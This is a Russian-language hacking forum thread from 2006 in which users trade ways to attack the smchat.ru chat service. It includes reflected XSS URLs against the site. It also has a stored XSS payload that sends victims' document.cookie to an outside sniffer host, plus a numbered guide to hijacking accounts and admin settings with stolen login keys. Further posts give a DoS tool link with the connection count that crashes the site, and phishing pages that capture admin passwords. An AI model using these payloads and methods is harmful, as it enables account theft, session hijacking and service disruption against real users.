Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Помогите со взломом smchat-а (https://forum.antichat.xyz/showthread.php?t=15416)

bike 04.03.2006 19:57

Помогите со взломом smchat-а
 
Помогите плз ломануть www.smchat.ru.у меня несколько вопросов,ответьте на какие сможете:Как его ломануть или чаты на нём?Как утащить админство или узнать пароли админа?Как узнать айпи если ты не модер?Какие проги есть для его взлома или флуда?

Rebz 05.03.2006 12:56

Я знаю как узнать Ip, если ты не модер, причём Ip любого юзера в чате и не только в твоем, а в любом (в этой системе).. но это думаю потом.. =) Полчше изучу движочек ихней на досуге)

bike 06.03.2006 21:49

Изучи плз и скажи как и что...Как айпи узнать?

izarion 23.03.2006 21:02

Да подскажите что нибудь по этой теме...
А именно как дёрнуть чужие куки?

Go0o$E 23.03.2006 22:34

Узнавать ip довольно легко =) создаешь свой чат и в нем пишешь /ip [имя пользователя]

DRON-ANARCHY 23.03.2006 23:54

Там на главной странице при отсутствии пользователя в базе данных, выводится, что пользователя с ником ***(че ввели) можно зарегать... На форме стоит ограничение кол-ва вводимых символов...но оно производится путем html то есть если исправить, что все будет тип-топ... времени нет..Кто-нибудь проверьте это на пассифную XSS

izarion 26.03.2006 04:04

Ну чё кто-нибудь может помочь?

izarion 30.03.2006 12:30

Мне один писал что можно зайти под чужим ником через фрейм сообщений, а как?

limpompo 30.03.2006 12:39

Вот прочитав всё это ко мне в голову идия пришла =) Система такова. Создаешь сайтик на нем создаешь ip.php заинклудь в индекс и попроси того узера Вглянуть на сайт и посмотреть он работает или нет... При заход на сайт у тебя его ИП в кармане, но в этом всём есть не доработка что он может с прокси зайти! Но попробовать можно!

izarion 30.03.2006 13:50

Цитата:

Сообщение от limpompo
Вот прочитав всё это ко мне в голову идия пришла =) Система такова. Создаешь сайтик на нем создаешь ip.php заинклудь в индекс и попроси того узера Вглянуть на сайт и посмотреть он работает или нет... При заход на сайт у тебя его ИП в кармане, но в этом всём есть не доработка что он может с прокси зайти! Но попробовать можно!

Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?

Go0o$E 30.03.2006 14:17

Вот - http://smchat.ru/chat.php?chatname=Go0oSE"><script>alert(/ok/)</script> пассивная XSS, вот только толку от этого?

Go0o$E 30.03.2006 15:37

И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222 %3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1

DRON-ANARCHY 30.03.2006 18:42

А я вот впендюрил в логин <script>alert() (т.е. скока влезло) и пасс любой... выскакивает ошибка в 364 строчке...

Go0o$E 30.03.2006 22:33

Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.

izarion 31.03.2006 00:35

Цитата:

Сообщение от Go0o$E
Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.

Я заметил что при регистрации нужен ключ, так вот ключ не какой нибудь а он зависит от введённого ника

Go0o$E 31.03.2006 01:31

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

izarion 31.03.2006 02:08

Цитата:

Сообщение от Go0o$E
Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

Ой ты прям гений! А то я незнал про это! Зацени первую страницу для начала. Что нибудь бы поинерестнее....

Go0o$E 31.03.2006 15:13

Может и гений! Что "поинерестнее" тебе надо? Может тебе root там нужен? Что там на первой странице? Там нет cookies которые ты "дёрнуть" хочешь! Там есть логин и ключ! Которых достаточно чтобы зайти в чат или изменить его если ты дернул ключ админа!
Итого:1) Чтобы узнать ip надо создать свой чат и в нем написать /ip [имя жертвы].
2) Чтобы зафлудить его вполне можно использовать "Универсальный чатфлудер" - http://forum.antichat.ru/thread16011.html
3) Стащить "пароль" можно создав свой чат и в настройках->Объявления вставить путь к снифферу и заманить жертву на свой чат.
4) Используя логин и ключ можно зайти в чат под жертвой - http://smchat.ru/chat.php?chatname=[имя чата]&login=[логин]&key=[ключ]
5) Если вы заманили админа одного из чатов можно так же изменить настройки чата - http://smchat.ru/index.php?chatname=[имя чата]&login=[логин]&key=[ключ]
6) Все.

izarion 02.04.2006 12:55

Цитата:

Сообщение от Go0o$E
Что там на первой странице?

Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?
Вот что я писал, а про то что там сессия, никто и не спорит, а про поитерестнее я имел ввиду то что там можно сделать автомотическую регистрацию, только как?

САМУРАЙ 04.04.2006 00:32

Цитата:

Сообщение от Go0o$E
Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

Ну ты даёшь..... правда я ничерта не понял про синфер :D

<script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. ну вот это как я понял долбучая смесь джиэс и тэга вставки изображения , ну ок, ты в этом плане смыслишь больше по этому спорить не буду, но вот КУДА ЭТО СОХРАНЯЕТСЯ ? ГДЕ МНЕ ПОТОМ ИСКАТЬ ЕГО ЛОГИН и КЛЮЧЬ ? :confused:

Антошка2003 04.04.2006 00:48

регистрируй себе сниффер и смотри логи.

САМУРАЙ 04.04.2006 01:15

Цитата:

Сообщение от Антошка2003
регистрируй себе сниффер и смотри логи.


Мужик, еслиб я ещё знал что такое "сниффер" и с чем его едят, а также хотелось бы знать где его регят и тд :d

Антошка2003 04.04.2006 01:23

может тебе лучше на кулинарный форум пойти?
_http://s.netsec.ru/ вот тут вот регь, а то что то на ачате не региться. и лучше почитай форум побольше, в уязвимостях форумов больше смотри, там это инфы хоть соли.

САМУРАЙ 04.04.2006 02:46

Хех...... зарегил, спосиб! Для детекта айпишника это конечно сойдёт, но вот где тут кукисы? Я тут нашёл только КУКИШИ :-)))) сделал простую HTML страничку, вставил туда код для "приватизации" кукисов и зашёл в неё... Чтож, айпишник он мне показал мой правильно, не спрю, но вот только кукисов там нема, и у меня ИЕ 6 но не мазила :-))) вот цитата:

Date 04.04.2006 01:36
IP **.**.**.***
Real Ip **.**.**.***
Referer
Query ;
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.4 (build 01348))

Даже модель моего маил агента узнал, но вот того чего надо нема :-)))))

САМУРАЙ 04.04.2006 02:49

Цитата:

Сообщение от Антошка2003
может тебе лучше на кулинарный форум пойти?

Ну спосибо хоть в бобруйск не послали. на на счёт кулинарного форума, я вообщето имею диплом шефповора французской кухни :d

izarion 04.04.2006 14:59

Цитата:

Сообщение от САМУРАЙ
но вот где тут кукисы?

А там нет кукисов :p
Там сессии, меняешь свои на чужие, и всё, но это при условие что чел не вышел и сессии не закрылись....

САМУРАЙ 05.04.2006 01:09

Цитата:

Сообщение от izarion
А там нет кукисов :p
Там сессии, меняешь свои на чужие, и всё, но это при условие что чел не вышел и сессии не закрылись....


Где там сессии? там айпишник виннда эксплотер и активный интернет пейджер :D

izarion 05.04.2006 16:50

Цитата:

Сообщение от САМУРАЙ
Где там сессии? там айпишник виннда эксплотер и активный интернет пейджер :D

Date 05.04.2006 09:51
IP 234.232.196.50
Real Ip 214.32.196.50
Referer http://www.smchat.ru/ban.php?chatnam...c3uEAIjCy9p5PP
Query ;hotlog=1
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

aslay 06.04.2006 17:51

создал сниф там непонятно куда втыкать код для кражи кукис?

Примерный код на воровство кукисов выглядит так******

САМУРАЙ 09.04.2006 00:28

Referer http://www.smchat.ru/ban.php?chatna...6c3uEAIjCy9p5PP
Query ;hotlog=1

как я понял после многоточия идёт какраз то что в кукисы надо присунуть, может это у меня не отобразилось, так как страничка была локальной (в компе у меня) а не на серваке? ну ладно с этим понятно, что для этого нужен кукис эдитор я тоже понял, а вот что за хрень Query ;hotlog=1 ??? :p

vectorg 09.04.2006 00:31

Цитата:

что за хрень Query ;hotlog=1
судя по всему это от счётчика _hotlog.ru +)))

izarion 09.04.2006 01:44

Цитата:

Сообщение от САМУРАЙ
Referer [url]http://www.smchat.ru/
как я понял после многоточия идёт какраз то что в кукисы надо присунуть, может это у меня не отобразилось, так как страничка была локальной (в компе у меня) а не на серваке? ну ладно с этим понятно, что для этого нужен кукис эдитор я тоже понял

да после многоточия идёт логин и ключ, авторизовываешся и меняешь свои данные на чужие.
hotlog непонадобится тебе точно. неотобразилось наверное из-за того что страничка была локальной. а кукис эдитор ненужен помоему)

Go0o$E 11.04.2006 15:52

Да, кстати smchat.ru падает при ~320 коннектах в Sprut =) Скачать можно с - nev.h16.ru/sprut.zip

Vovs 11.04.2006 16:22

Пробывал закидать этот чат пакетами, получилось,чат подвис но не завис ((.

izarion 12.04.2006 02:39

да с одной стороны это хорошо, поиздеваться над ними, но лучше сразу убить)

-Concord- 17.06.2006 12:31

Но легче искать глупых админов и забирать их чат так, делаешь страницу наподобее www.msconcord.narod.ru/chat.html и просишь заценить, и пароль админа летит на мыло

-Concord- 17.06.2006 12:35

срабатывало практически со всеми :p

-Concord- 17.06.2006 12:41

Цитата:

Сообщение от Go0o$E
Да, кстати smchat.ru падает при ~320 коннектах в Sprut =) Скачать можно с - nev.h16.ru/sprut.zip

блин у меня ссылка на него не работает , где мона закачать этот "Sprut" :D

-Concord- 17.06.2006 12:50

Цитата:

Сообщение от Go0o$E
И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222 %3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=3 33333333%3Balert(xss_test)%3B</script>&password=1

хм... не понял, а для чего это нужно? :confused:

-Concord- 18.06.2006 19:44

блин. тема старая, никто не смотрит


Время: 15:52